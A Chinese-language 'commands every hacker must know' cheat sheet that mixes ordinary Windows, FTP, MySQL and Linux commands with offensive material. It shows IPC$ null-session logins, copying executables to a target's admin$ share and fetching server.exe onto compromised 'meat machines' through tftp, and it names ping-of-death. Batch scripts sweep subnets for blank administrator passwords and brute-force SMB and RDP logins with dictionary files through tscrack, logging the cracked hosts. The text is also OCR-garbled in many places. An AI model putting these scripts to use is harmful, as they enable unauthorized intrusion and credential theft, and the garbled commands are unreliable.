黑客必知的DOS命令大全

黑客必知的DOS命令大全!

cmd①

netuseipipc$""/user:""建立IPC空鏈接

netuseipipc$〃密碼〃/user:"用戶名"建立IPC非空鏈接

netuseh:ipc$〃密碼〃/user:〃用戶名〃直接登陸后映射對方C：到本地為H:

netuseh:ipc$登陸后映射對方C：到本地為H:

netuseipipc$/del刪除IPC鏈接

netuseh:/del刪除映射對方到本地的為H:的映射

netuser用戶名密碼/add建立用戶

netuserguest/active:yes激活guest用戶

netuser查看有哪些用戶

netuser帳戶名查看帳戶的屬性

netlocaLGroupadministrators用戶名/add把“用戶”添加到管理員中使其具有管理員

權限,注意：administrator后加s用復數

netstart查看開啟了哪些服務

netstart服務名開啟服務；（如：netstarttelnet,netstartschedule）

netstop服務名停止某服務

nettime目標ip查看對方時間

nettime目標ip/set設置本地計算機時間與“目標IP”主機的時間同步，加上參數/yes

可取消確認信息

netview查看本地局域網內開啟了哪些共享

netviewip查看對方局域網內開啟了哪些共享

netconfig顯示系統(tǒng)網絡設置

netlogoff斷開連接的共享

netpause服務名暫停某服務

netsendip”文本信息〃向對方發(fā)信息

netver局域網內正在使用的網絡連接類型和信息

netshare查看本地開啟的共享

netshareipc$開啟ipc$共享

netshareipc$/del刪除ipc$共享

netsharec$/del刪除C：共享

netuserguest12345用guest用戶登陸后用將密碼改為12345

netpassword密碼更改系統(tǒng)登陸密碼

netstat-a查看開啟了哪些端口，常用netstat-an

netstat-n查看端口的網絡連接情況，常用netstat-an

netstat-v查看正在進行的工作

netstat-p協(xié)議名例：netstat-ptcq/ip查看某協(xié)議使用情況（查看tcp/ip協(xié)議使用情

況）

netstat-s查看正在使用的所有協(xié)議使用情況

nBTstat-Aip對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03

前的為用戶名）-注意：參數-A要大寫

trAcert-參數ip（或計算機名）跟蹤路由（數據包）,參數：“r數字”用于設置超時間隔。

pingip（或域名）向對方主機發(fā)送默認大小為32字節(jié)的數據，參數:“-1［空格］數據包大小”;

“-n發(fā)送數據次數”；“-t”指一直ping。

ping-t-165550ip死亡之ping（發(fā)送大于64K的文件并一直ping就成了死亡之ping）

ipconfig（winipcfg）用于windowsNT及XP（windows9598）查看本地ip地址，ipconfig

可用參數“/all”顯示全部配置信息

tlist-t以樹行列表顯示進程（為系統(tǒng)的附加工具，默認是沒有安裝的，在安裝目錄的

Support/tools文件夾內）

kill-F進程名加-F參數后強制結束某進程（為系統(tǒng)的附加工具，默認是沒有安裝的，在安

裝目錄的Support/tools文件夾內）

del-F文件名加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱

藏、系統(tǒng)、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統(tǒng)、存檔以外的

文件。例如“DEL/AR*.*"表示刪除當前目錄下所有只讀文件，“DEL/A-S*.*"表示刪除當

前目錄下除系統(tǒng)文件以外的所有文件

del/S/Q目錄或用：rmdir/s/Q目錄/S刪除目錄及目錄下的所有子目錄和文件。同時

使用參數/Q可取消刪除操作時的系統(tǒng)確認就直接刪除。（二個命令作用相同）

move盤符路徑要移動的文件名存放移動文件的路徑移動后文件名移動文件,用參數/y將

取消確認移動目錄存在相同文件的提示就直接覆蓋

fcone.txttwo.txt>3st.txt對比二個文件并把不同之處輸出到3st.txt文件中，”>"

和“>>"是重定向命令

atid號開啟已注冊的某個計劃任務

at/delete停止所有計劃任務，用參數/yes則不需要確認就直接停止

atid號/delete停止某個已注冊的計劃任務

at查看所有的計劃任務

atiptime程序名（或一個命令）/r在某時間運行對方某程序并重新啟動計算機

fingerusername?host查看最近有哪些用戶登陸

telnetip端口遠和登陸服務器，默認端口為23

openip連接到IP（屬telnet登陸后的命令）

telnet在本機上直接鍵入telnet將進入本機的telnet

copy路徑文件名1路徑文件名2/y復制文件1到指定的目錄為文件2,用參數/y就同時

取消確認你要改寫一份現存目錄文件

copyc:srv.exeipadmin$復制本地c:srv.exe到對方的admin下

cppy1st.jpg/b+2st.txt/a3st.jpg將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的

文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件

copyipadmin$svv.exec:或：copyipadmin$*.*復制對方2而1鋸1$共享下的srv.exe文件（所

有文件）至本地C：

xcopy要復制的文件或目錄樹目標地址目錄名復制文件和目錄樹，用參數/Y將不提示覆

蓋相同文件

tftp-i自己IP（用肉機作跳板時這用肉機IP）getserver,exec:server,exe登陸后，將

"IP”的server.exe下載到目標主機c:server,exe參數：-i指以二進制模式傳送,如傳送

exe文件時用，如不加-i則以ASCII模式（傳送文本文件模式）進行傳送

tftp-i對方IPputc:server,exe登陸后，上傳本地c:server,exe至主機

ftpip端口用于上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式

傳送（可執(zhí)行文件進）；默認為ASCH格式傳送（文本文件時）

routeprint顯示出IP路由，將主要顯示網絡地址Networkaddres,子網掩碼Netmask,網

關地址Gatewayaddres,接口地址Interface

arp查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC

地址。arp-a將顯不出全部信息

start程序名或命令/max或/min新開一個新窗口并最大化（最小化）運行某程序或命令

mem查看cpu使用情況

attrib文件名（目錄名）查看某文件（目錄）的屬性

attrib文件名-A-R-S-H或+A+R+S+H去掉（添加）某文件的存檔，只讀，系統(tǒng)，隱

藏屬性；用+則是添加為某屬性

dir查看文件，參數：/Q顯示文件及目錄屬系統(tǒng)哪個用戶，/T:C顯示文件創(chuàng)建時間，/T:A

顯示文件上次被訪問時間，/T:W上次被修改時間

date/t、time/t使用此參數即“DATE/T"、“TIME/T”將只顯示當前日期和時間,而不必

輸入新II期和時間

set指定環(huán)境變量名稱=要指派給變量的字符設置環(huán)境變量

set顯示當前所有的環(huán)境變量

setp（或其它字符）顯示出當前以字符p（或其它字符）開頭的所有環(huán)境變量

pause暫停批處理程序，并顯示出：請按任意鍵繼續(xù)....

if在批處理程序中執(zhí)行條件處理（更多說明見if命令及變量）

goto標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，

例如：“：startw標簽）

call路徑批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call/?）

for對一組文件中的每一個文件執(zhí)行某個特定命令（更多說明見for命令及變量）

echoon或off打開或關閉echo,僅用echo不加參數則顯示當前echo設置

echo信息在屏幕上顯示出信息

echo信息?pass,txt將"信息"保存到pass.txt文件中

findstr"Hello"aa.txt在aa.txt文件中尋找字符串hello

find文件名查找某文件

title標題名字更改CMD窗口標題名字

color顏色值設置cmd控制臺前景和背景顏色；0=黑、1=藍、2=綠、3=淺綠、4=紅、5

=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、8=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮

白

prompt名稱更改cmd.exe的顯示的命令提示符（把C:、D:統(tǒng)一改為：EntSky）

ver在DOS窗口下顯示版本信息

winver彈出一個窗口顯示版本信息（內存大小、系統(tǒng)版本、補丁版本、計算機名）

format盤符/FS:類型格式化磁盤,類型:FAT、FAT32,NTFS，例：FormatI）:/FS:NTFS

md目錄名創(chuàng)建目錄

replace源文件要替換文件的目錄替換文件

ren原文件名新文件名重命名文件名

tree以樹形結構顯示出目錄，用參數-f將列出第個文件夾中文件名稱

type文件名顯示文本文件的內容

more文件名逐屏顯示輸出文件

doskey要鎖定的命令=字符

doskey要解鎖命令=為DOS提供的鎖定命令（編輯命令行，重新調用win2k命令，并創(chuàng)建宏）。

如:鎖定dir命令：doskeydir=entsky（不能用doskeydir=dir）；解鎖：doskeydir=

taskmgr調出任務管理器

chkdsk/FD:檢查磁盤D并顯示狀態(tài)報告；加參數/f并修復磁盤上的錯誤

tlntadmntelnt服務admn,健入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端

口23為其它任何端口

exit退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe

path路徑可執(zhí)行文件的文件名為可執(zhí)行文件設置一個路徑。

cmd啟動一個win2K命令解釋窗口。參數：/eff、/en關閉、開啟命令擴展；更我詳細說明

見cmd/?

regedit/s注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示；

regedit/e注冊表文件名導出注冊表

cacls文件名參數顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D

用戶名：設定拒絕某用戶訪問；/P用戶名:perm替換指定用戶的訪問權限；/G用戶名：perm

賦予指定用戶訪問權限；Perm可以是：N無，R讀取，W寫入，C更改（寫入），F完全控

制；例：caclsD:est.txt/Dpub設定d:est.txt拒絕pub用戶訪問。

cacls文件名查看文件的訪問用戶權限列表

REM文本內容在批處理文件中添加注解

netsh查看或更改本地網絡配置情況

IIS服務命令：

iisreset/reboot重啟win2k計算機（但有提示系統(tǒng)將重啟信息出現）

iisreset/start或stop啟動（停止）所有Internet服務

iisreset/restart停止然后重新啟動所有Internet服務

iisreset/status顯示所有Internet服務狀態(tài)

iisreset/enable或disable在本地系統(tǒng)上啟用（禁用）Internet服務的重新啟動

iisreset/rebootonerror當啟動、停止或重新啟動Internet服務時，若發(fā)生錯誤將重新開

機

iisreset/noforce若無法停止Internet服務，將不會強制終止Internet服務

iisreset/timeoutVai在到達逾時間（秒）時，仍未停止Internet服務，若指定

/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開

機0秒。

FTP命令：（后面有詳細說明內容）

ftp的命令行格式為：

ftp-v-d-i-n—g［主機名］—v顯示遠程服務器的所有響應信息。

-d使用調試方式。

-n限制ftp的自動登錄，即不使用.netrc文件。

—g取消全局文件名。

help［命令］或？［命令］查看命令說明

bye或quit終止主機FTP進程,并退出FTP管理方式.

pwd列出當前遠端主機目錄

put或send本地文件名［上傳到主機上的文件名］將本地一個文件傳送至遠端主機中

get或recv［遠程主機文件名］［下載到本地后的文件名］從遠端主機中傳送至本地主機中

mget[remote-files]從遠端主機接收一批文件至本地主機

mputlocal-files將本地主機中一批文件傳送至遠端主機

dir或Is[remote-directory][local-file]列出當前遠端主機目錄中的文件.如果有本地

文件,就將結果寫至本地文件

ascii設定以ASCII方式傳送文件（缺省值）

bin或image設定以二進制方式傳送文件

bell每完成一次文件傳送，報警提示

cdup返回上一級目錄

close中斷與遠程服務器的ftp會話（與open對應）

openhost[port]建立指定ftp服務器連接，可指定連接端口

delete刪除遠端主機中的文件

mdelete[remote-files]刪除一批文件

mkdirdirectory-name在遠端主機中建立目錄

rename[from][to]改變遠端主機中的文件名

rmdirdirectory-name刪除遠端主機中的目錄

status顯示當前FTP的狀態(tài)

system顯示遠端主機系統(tǒng)類型

useruser-name[password][account]重新以別的用戶名登錄遠端主機

openhost[port]重新建立一個新的連接

prompt交互提示模式

macdef定義宏命令

led改變當前本地主機的工作目錄，如果缺省，就轉到當前用戶的HOME目錄

chmod改變遠端主機的文件權限

case當為ON時,用MGET命令拷貝的文件名到本地機器中，全部轉換為小寫字母

cdremote-dir進入遠程主機目錄

cdup進入遠程主機目錄的父目錄

!在本地機中執(zhí)行交互shell,exit回到ftp環(huán)境，如！Is*,zip

MYSQL命令：

mysql-h主機地址-u用戶名一p密碼連接MYSQL;如果剛安裝好MYSQL,超級用戶root是

沒有密碼的。

（例：mysql-hllO.110.110.110-Uroot-P123456

注:u與root可以不用加空格，其它也一樣）

exit退出MYSQL

mysqladmin-u用戶名-p舊密碼password新密碼修改密碼

grantselecton數據庫.*to用戶名@登錄主機identifiedby〃密碼〃；增加新用戶。（注

意：和上面不同，下面的因為是MYSQL環(huán)境中的命令，所以后面都帶一個分號作為命令結束

符）

showdatabases;顯示數據庫列表。剛開始時才兩個數據庫:mysql和test。mysql庫很重

要它里面有MYSQL的系統(tǒng)信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。

usemysql；

showtables;顯示庫中的數據表

describe表名；顯示數據表的結構

createdatabase庫名；建庫

use庫名;

createtable表名（字段設定列表）；建表

dropdatabase庫名;

droptable表名；刪庫和刪表

deletefrom表名；將表中記錄清空

select*from表名；顯示表中的記錄

mysqldump-optschool>school.bbb備份數據庫:（命令在DOS的mysqlin目錄下執(zhí)行）;

注釋:將數據庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，

打開看看你會有新發(fā)現。

win2003系統(tǒng)下新增命令（實用部份）：

shutdown/參數關閉或重啟本地或遠程主機。

參數說明：/S關閉主機，/R重啟主機，/T數字設定延時的時間，范圍0?180秒之間，/A

取消開機，/M//IP指定的遠程主機。

例：shutdown/r/t0立即重啟本地主機（無延時）

taskill/參數進程名或進程的pid終止一個或多個任務和進程。

參數說明：/PID要終止進程的pid,可用tasklist命令獲得各進程的pid,/1M要終止的進

程的進程名，/F強制終止進程，/T終止指定的進程及他所啟動的子進程.

tasklist顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符（PID）。

參數說明：/M列出當前進程加載的dll文件，/SVC顯示出每個進程對應的服務，無參數時

就只列出當前的進程。

Linux系統(tǒng)下基本命令：要區(qū)分大小寫

uname顯示版本信息（同win2K的ver）

dir顯示當前目錄文件，Is-al顯示包括隱藏文件（同win2K的dir）

pwd查詢當前所在的目錄位置

cdcd..回到上一層目錄，注意cd與..之間有空格。cd/返回到根目錄。

cat文件名查看文件內容

cat>abc.txt往abc.txt文件中寫上內容。

more文件名以一頁一頁的方式顯示一個文本文件。

cp復制文件

mv移動文件

rm文件名刪除文件，rm-a目錄名刪除目錄及子目錄

mkdir目錄名建立目錄

rmdir刪除子目錄，目錄內沒有文檔。

chmod設定檔案或目錄的存取權限

grep在檔案中查找字符串

diff檔案文件比較

find檔案搜尋

date現在的日期、時間

who查詢目前和你使用同■■臺機器的人以及Login時間地點

w查詢目前上機者的詳細資料

whoami查看自己的帳號名稱

groups查看某人的Group

passwd更改密碼

history查看自己下過的命令

ps顯示進程狀態(tài)

kill停止某進程

gcc黑客通常用它來編譯C語言寫的文件

su權限轉換為指定使用者

telnetIPtelnet連接對方主機（同win2K）,當出現bash$時就說明連接成功。

ftpftp連接上某服務器（同win2K）

計算機運行命令全集winver--------檢查Windows版本

wmimgmt.msc---打開windows管理體系結構

wupdmgr-------windows更新程序

winver--------檢查Windows版本

wmimgmt.msc---打開windows管理體系結構

wupdmgr-------windows更新程序

wwww-------windows腳本宿主設置

write---------寫字板winmsd-----系統(tǒng)信息

wiaacmgr------掃描儀和照相機向導

winchat-------XP自帶局域網聊天

mem.exe-------顯示內存使用情況

Msconfig.exe—系統(tǒng)配置實用程序

mplayer2------簡易widnowsmediaplayer

mspaint-------畫圖板

mstsc---------遠程桌面連接

mplayer2------媒體播放機

magnify-------放大鏡實用程序

mmc------------打開控制臺

mobsync-------同步命令

dxdiag--------檢查directx信息

drwtsn32------系統(tǒng)醫(yī)生

devmgmt.msc—設備管理器

dfrg.msc------磁盤碎片整理程序

diskmgmt,msc--磁盤管理實用程序

deomenfg------打開系統(tǒng)組件服務

ddeshare------打開DDE共享設置

dvdplay-------DVD播放器

netstopmessenger----停止信使服務

netstartmessenger---開始信使服務

notepad-------打開記事本

nslookup------網絡管理的工具向導

ntbackup------系統(tǒng)備份和還原

narrator------屏幕〃講述人〃

ntmsmgr.msc---移動存儲管理器

ntmsoprq.msc--移動存儲管理員操作請求

netstat-an---（TC）命令檢查接口

syncapp-------創(chuàng)建一個公文包

sysedit-------系統(tǒng)配置編輯器

sigverif------文件簽名驗證程序

sndrec32------錄音機

shrpubw-------創(chuàng)建共享文件夾

secpol.msc----本地安全策略

syskey--------系統(tǒng)加密，一旦加密就不能解開，保護windowsxp系統(tǒng)的雙重密碼

services,msc---本地服務設置

Sndvol32------音量控制程序

sfc.exe-------系統(tǒng)文件檢查器

sfc/scannow—windows文件保護

tsshutdn------60秒倒計時關機命令

tourstart-----xp簡介（安裝完成后出現的漫游xp程序）

taskmgr-------任務管理器

eventvwr------事件查看器

eudcedit------造字程序

explorer------打開資源管理器

packager------對象包裝程序

perfmon.msc---計算機性能監(jiān)測程序

progman--------程序管理器

regedit,exe---注冊表

rsop.msc-------組策略結果集

regedt32-------注冊表編輯器

rononce-p---15秒關機

regsvr32/u*.dll----停止dll文件運行

regsvr32/uzipfldr.dll------取消ZIP支持

cmd.exe-------CMD命令提示符

chkdsk.exe----Chkdsk磁盤檢查

certmgr.msc---證書管理實用程序

calc----------啟動計算器

charmap-------啟動字符映射表

cliconfg------SQLSERVER客戶端網絡實用程序

Clipbrd-------剪貼板查看器

conf----------啟動netmeeting

compmgmt,msc---計算機管理

c1eanmgr------**整理

ciadv.msc-----索引服務程序

osk-----------打開屏幕鍵盤

odbcad32------ODBC數據源管理器

oobe/msoobe/a---檢查XP是否激活

lusrmgr.msc---本機用戶和組

logoff--------注銷命令

iexpress------木馬捆綁工具，系統(tǒng)自帶

Nslookup------IP地址偵測器

fsmgmt.msc----共享文件夾管理器

utilman-------輔助工具管理器

gpedit.msc----組策略

批處理命令與變量

1：for命令及變量基本格式：

FOR/參數%variableIN(set)DOcommand[command_parameters]%variable:指定一個單

一字母可替換的參數，如：%i,而指定一個變量則用：%%i,而調用變量時用：%i%,變量

是區(qū)分大小寫的(而不等于%Do

批處理每次能處理的變量從%0—%9共10個，其中%0默認給批處理文件名使用，％1默認為使

用此批處理時輸入的的第一個值，同理:％2—%9指輸入的第2-9個值;例：netuseipipc$pass

/user:user中ip為%1,pass為％2,user為%3

(set):指定一個或一組文件,可使用通配符,如:(D:user.txt)和(11254)(1-1254),{^(1

1254)”第一個〃1〃指起始值，第二個〃1〃指增長量，第三個〃254〃指結束值，BU：從1到254；

“(1-1254)”說明：即從254到1}

command：指定對第個文件執(zhí)行的命令，如：netuse命令；如要執(zhí)行多個命令時，命令這間

加：&來隔開

commandparameters：為特定命令指定參數或命令行開關

IN(set)：指在(set)中取值;DOcommand：指執(zhí)行command

參數：/L指用增量形式{(set)為增量形式時}；/F指從文件中不斷取值，直到取完為止

{(set)為文件時，如(d:pass,txt)時}。

用法舉例：

@echooff

echo用法格式：test,bat*.*.*>test,txt

for/L%%Gin(11254)doecho%1.%%G?test.txt&netuse%1.%%G/user:administrator

Ifind〃命令成功完成〃?test.txt

存為test,bat說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為

空的IPC$連接，如果成功就把該1P存在test,txt中。

/L指用增量形式(即從1-254或254T)；輸入的IP前面三位:*.*.*為批處理默認的%1；%%G

為變量(ip的最后一位)；&用來隔開echo和netuse這二個命令；|指建立了ipc$后，在

結果中用find查看是否有〃命令成功完成〃信息；％1.%%G為完整的IP地址；(11254)指起

始值，增長量，結止值。

?echooff

echo用法格式：ok.batip

FOR/F%%iIN(D:user.die)DOsmb.exe%1%%iD:pass.die200

存為：ok.exe說明：輸入一個IP后，用字典文件d:pass.die來暴解d:user.die中的用戶

密碼，直到文件中值取完為止。％%i為用戶名；％1為輸入的IP地址(默認)。

七：

2：if命令及變量基本格式：

IF[not]errorlevel數字命令語句如果程序運行最后返回一個等于或大于指定數字的退

出編碼，指定條件為“真二

例：IFerrorlevel0命令指程序執(zhí)行后返回的值為0時，就值行后面的命令；IFnot

errorlevel1命令指程序執(zhí)行最后返回的值不等于1,就執(zhí)行后面的命令。

0指發(fā)現并成功執(zhí)行（真）；1指沒有發(fā)現、沒執(zhí)行（假）。

IF[not]字符串1==字符串2命令語句如果指定的文本字符串匹配（即：字符串1等于字

符串2）,就執(zhí)行后面的命令。

例：“if"%2曠=="4"gotostart”指：如果輸入的第二個變量為4時，執(zhí)行后面的命令（注

意：調用變量時就%變量名％并加"

IF[not]exist文件名命令語句如果指定的文件名存在，就執(zhí)行后面的命令。

例："ifnotnc.exegotoend”指：如果沒有發(fā)現nc.exe文件就跳到"：end”標簽處。

IF[not]errorlevel數字命令語句else命令語句或IF[not]字符串1==字符串2命令

語句else命令語句或IF[not]exist文件名命令語句else命令語句加上：else命令

語句后指：當前面的條件不成立時，就指行else后面的命令。注意：else必須與if在同

一行才有效。當有del命令時需把del命令全部內容用＜＞括起來，因為del命令要單獨一

行時才能執(zhí)行，用上＜＞后就等于是單獨一行了；例如："ifexisttest.txt.elseecho

test.txt.missing",注意命令中的"

終端服務密碼破解tscrack:

參數說明

-h顯示使用幫助

-v顯示版本信息

-s在屏幕上打出解密能力

-b密碼錯誤時發(fā)出的聲音

-t同是發(fā)出多個連接（多線程）

-NPreventSystemLogentriesontargetedserver

-U卸載移除tscrack組件

-f使用一f后面的密碼

-F間隔時間（頻率）

-1使用一1后面的用戶名

-w使用一w后面的密碼字典

-p使用一p后面的密碼

-D登錄主頁面

用法示例

tscrack192.168.0.1-1administrator-wpass,die遠程用密碼字典文件暴破主機的

administrator的登陸密碼

tscrack192.168.0.1-1administrator-p123456用密碼123456遠程登陸192.168.0.1

的administrator用戶

@ifnotexistipcscan.txtgotonosean

?for/ftokens=ldelims="%%iin（3389.txt）docallhack,bat%%i

nscan

?echo3389.txtnofindorscanfaild

（①存為3389.bat）（假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列

表文件3389.txt）

3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack,bat

@ifnotexisttscrack.exegotonosean

?tscrack%1-1administrator-wpass,die?rouji.txt

:nosean

?echotscrack.exenofindorscanfaild

（②存為hack,bat）（運行3389.bat就OK,且3389.bat,hack.bat..3389.txt＞pass,die

與tscrack.exe在同一個目錄下；就可以等待結果了）

hack.bat意思是：運行tscrack.exe用字典暴破3389.txt中所有主機的administrator密

碼，并將破解結果保存在rouji.txt文件中。

掃描工具：xscan

基本格式

xscan-host〈起始IP＞［Y終止IP＞］＜檢測項目》［其他選項］掃錨”起始IP到終止IP"段的

所有主機信息

xscan-file〈主機列表文件名〉（檢測項目》［其他選項］掃錨〃主機IP列表文件名”中的所

有主機信息

檢測項目

-active檢測主機是否存活

-os檢測遠程操作系統(tǒng)類型（通過NETBIOS和ISNMP協(xié)議）

-port檢測常用服務的端口狀態(tài)

-ftp檢測FTP弱口令

-pub檢測FTP服務匿名用戶寫權限

-pop3檢測P0P3-Server弱口令

-smtp檢測SMTP-Server漏洞

-sql檢測SQL-Server弱口令

-smb檢測NT-Server弱口令

-iis檢測IIS編碼/解碼漏洞

-cgi檢測CGI漏洞

-nasi加載Nessus攻擊腳本

-all檢測以上所有項目

其它選項

-i適配器編號設置網絡適配器，〈適配器編號）可通過參數獲取

-1顯示所有網絡適配器

-v顯示詳細掃描進度

-P跳過沒有響應的主機

-0跳過沒有檢測到開放端口的主機

-t并發(fā)線程數量，并發(fā)主機數量指定最大并發(fā)線程數量和并發(fā)主機數量，默認數量為

100,10

-log文件名指定掃描報告文件名（后綴為：TXT或HTML格式的文件）

用法示例

xscan-host192.168.1.1-192.168.255.255-al1-active-p檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機

xscan-host192.168.1.1-192.168.255.255-port-smb-t150-o檢測

192.168.1.1-192.168.255.255網段內主機的標準端口狀態(tài)，NT弱口令用戶,最大并發(fā)線程

數量為150,跳過沒有檢測到開放端口的主機

xscan-filehostlist,txt-port-cgi-t200,5-v-o檢測“hostlist,txt”文件中列出

的所有主機的標準端口狀態(tài)，CGI漏洞，最大并發(fā)線程數量為200,同一時刻最多檢測5臺主

機，顯示詳細檢測進度，跳過沒有檢測到開放端口的主機

FTP命令是Internet用戶使用最頻繁的命令之一，熟悉并靈活應用FTP的內部命令，可以大

大方便使用者，并收到事半功倍之效。如果你想學習使用進行后臺FTP下載，那么就必須學

習FTP指令。

FTP的命令行格式為：

ftp-v-d-i-n-g[主機名],其中

-v顯示遠程服務器的所有響應信息

-n限制ftp的自動登錄，即不使用；.netrc文件：

-d使用調試方式；

-g取消全局文件名。

FTP使用的內部命令如下（中括號表示可選項）：

1.![cmd[args]]：在本地機中執(zhí)行交互shell,exit回到ftp環(huán)境,如：！ls*.zip

2.$macro-ame[args]：執(zhí)行宏定義macro-name。

3.account[password]：提供登錄遠程系統(tǒng)成功后訪問系統(tǒng)資源所需的補充口令。

4.appendlocal-file[remote-file]：將本地文件追加到遠程系統(tǒng)主機，若未指定遠程系統(tǒng)

文件名，則使用本地文件名。

5.ascii：使用ascii類型傳輸方式。

6.bell：每個命令執(zhí)行完畢后計算機響鈴一次。

7.bin：使用二進制文件傳輸方式。

8.bye：退出ftp會話過程。

9.case：在使用mget時，將遠程主機文件名中的大寫轉為小寫字母。

10.cdremote-dir：進入遠程主機目錄。

ll.cdup：進入遠程主機目錄的父目錄。

12.chmodmodefile-name：將遠程主機文件file-name的存取方式設置為mode,如：chmod

777a.out.

13.close：中斷與遠程服務器的ftp會話（與open對應）。

14.cr：使用asscii方式傳輸文件時，將回車換行轉換為回行。

15.deleteremote-file：刪除遠程主機文件。

16.debug[debug-value]：設置調試方式，顯示發(fā)送至遠程主機的每條命令，如：debup3,

若設為0,表示取消debug。

17.dir[remote-dir][local-file]：顯示遠程主機目錄，并將結果存入本地文件。

18.disconNECtion：同close。

19.formformat：將文件傳輸方式設置為format,缺省為file方式。

20.getremote-file[local-file]：將遠程主機的文件remote-file傳至本地硬盤的

local-file。

21.glob：設置mdelete,mget,mput的文件名擴展，缺省時不擴展文件名，同命令行的-g

參數。

22.hash：每傳輸1024字節(jié)，顯示一個hash符號（#）。

23.help[cmd]：顯示ftp內部命令cmd的幫助信息,如：helpgeto

24.idle[seconds]：將遠程服務器的休眠計時器設為[seconds]秒。

25.image：設置二進制傳輸方式（同binary）o

26.led[dir]：將本地工作目錄切換至dir。

27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir,并存入本地文件local-file。

28.macdefmacro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。

29.mdelete[remote-file]：刪除遠程主機文件。

30.mdirremote-fileslocal-file：與dir類似，但可指定多個遠程文件，如：mdir

*.o.*.zipoutfile。

31.mgetremote-files：傳輸多個遠程文件。

32.mkdirdir-name：在遠程主機中建一目錄。

33.misremote-filelocal-file：同nlist,但可指定多個文件名。

34.mode[modename]：將文件傳輸方式設置為modename,缺省為stream方式。

35.modtimefile-name：顯示遠程主機文件的最后修改時間。

36.mputlocal-file：將多個文件傳輸至遠程主機。

37.newerfile-name：如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近，

則重傳該文件。

38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單,并存入本地硬盤的

local-file。

39.nmap[inpatternoutpattern]：設置文件名映射機制，使得文件傳輸時，文件中的某些

字符相互轉換，如：nmap$1.$2.$3[$1,$2].[$2,$3],則傳輸文件al.a2.a3時,文件名

變?yōu)閍l,a2o該命令特別適用于遠程主機為非UNIX機的情況。

40.ntrans[inchars[ou